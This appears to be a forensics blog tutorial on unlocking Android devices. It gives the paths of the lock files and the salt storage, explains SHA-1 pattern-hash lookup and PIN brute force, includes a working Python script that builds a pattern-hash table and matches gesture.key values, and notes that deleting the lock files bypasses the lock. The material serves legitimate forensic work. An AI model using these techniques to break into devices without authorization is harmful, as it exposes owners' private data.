Extracting data from a locked Android device
Today we are going to talk about unlocking Android mobile devices. There are two main types of locks: Pattern and PIN/Password. To crack either, a forensic examiner needs to extract one or two files from the mobile device. Of course, there is no universal solution, but there are three main options:
- To use Android Debug Bridge. The mobile device being examined must be rooted and USB debugging must be enabled.
- To flash a custom recovery. The device’s bootloader must be unlocked.
- To use JTAG or Chip-off techniques.
To crack a Pattern lock you need just one file, located at /data/system/. The filename is gesture.key. This file contains an unsalted SHA-1 hash of the device's Pattern lock. The number of possible patterns is limited, because each node (0 – 8) can be used only once. To crack it, a rainbow table with all possible variations needs to be created. We are not going to reinvent the wheel, because talented digital forensics analysts from CCL have already created a Python 3 script that solves the problem. You can download it here. Run the script and in about 30 minutes you'll get an SQLite database with all possible pattern hash variants. Now you can search the DB for the hash extracted from your gesture.key file.
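The following Python is an added illustration of why that table is feasible; it is not the CCL script or code from the original post. It assumes the gesture.key layout described above (SHA-1 over the node indices as raw bytes, no salt) and Android's drawing rule that a stroke cannot jump over an unvisited node, which keeps the whole keyspace at 389,112 patterns; the sample hash at the end is constructed, not extracted from a device.

```python
import hashlib

# Nodes are numbered 0..8 row-major on the 3x3 grid.
def middle_node(a, b):
    """Return the node that a straight stroke from a to b passes over, or None."""
    ra, ca = divmod(a, 3)
    rb, cb = divmod(b, 3)
    if (ra + rb) % 2 or (ca + cb) % 2:
        return None
    return ((ra + rb) // 2) * 3 + (ca + cb) // 2

def is_valid_pattern(pattern):
    """True if the lock screen would accept this node sequence as drawn."""
    if not 4 <= len(pattern) <= 9 or len(set(pattern)) != len(pattern):
        return False
    if any(not 0 <= n <= 8 for n in pattern):
        return False
    seen = set()
    for a, b in zip(pattern, pattern[1:]):
        seen.add(a)
        m = middle_node(a, b)
        if m is not None and m not in seen:  # would jump over an unvisited node
            return False
    return True

def gesture_key_hash(pattern):
    """gesture.key stores the unsalted SHA-1 of the node indices as bytes."""
    return hashlib.sha1(bytes(pattern)).digest()

def all_valid_patterns():
    """Depth-first enumeration of every pattern the lock screen accepts."""
    out = []
    def walk(seq, seen):
        if len(seq) >= 4:
            out.append(tuple(seq))
        for n in range(9):
            if n in seen:
                continue
            m = middle_node(seq[-1], n)
            if m is not None and m not in seen:
                continue
            walk(seq + [n], seen | {n})
    for start in range(9):
        walk([start], {start})
    return out

def build_table():
    """Map every possible gesture.key value back to its pattern (the rainbow table)."""
    return {gesture_key_hash(p): p for p in all_valid_patterns()}

def lookup(table, gesture_key_bytes):
    """Search the table for the 20 raw bytes read from gesture.key."""
    return table.get(gesture_key_bytes)

if __name__ == "__main__":
    table = build_table()
    print(len(table))  # 389112 entries, built in seconds
    sample = gesture_key_hash([0, 3, 6, 7, 8])  # constructed stand-in for a gesture.key file
    print(lookup(table, sample))
```

Because the hash is unsalted and the keyspace this small, the table is computed once and reused for every device; this is the design weakness that later Android versions addressed.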
To crack a PIN or password you need two files. The first file is password.key, located at /data/system/; the second is settings.db (for Android prior to 4.4), located at /data/data/com.android.providers.settings/databases/, or locksettings.db (for Android 4.4 and higher), located at /data/system/. We need two files instead of one because this time the hash is salted. In settings.db the salt can be found in the "secure" table, in locksettings.db in the "locksettings" table. Use your favourite SQL browser to find the lockscreen.password_salt key. Of course, if you are a hex editor addict, you can use your favourite tool instead. Now it's time for good old brute force. And again, CCL has a Python 3 script to solve the problem. It can be downloaded here. To start cracking, run the script with the hash, the salt and the maximum code length (4 – 16) filled in.
To tell the truth, you don't even need to crack the Pattern, PIN or password. You can bypass it by deleting the relevant files. Of course, that is not forensically sound. Nevertheless, this is the only way to bypass the locks on Lollipop devices.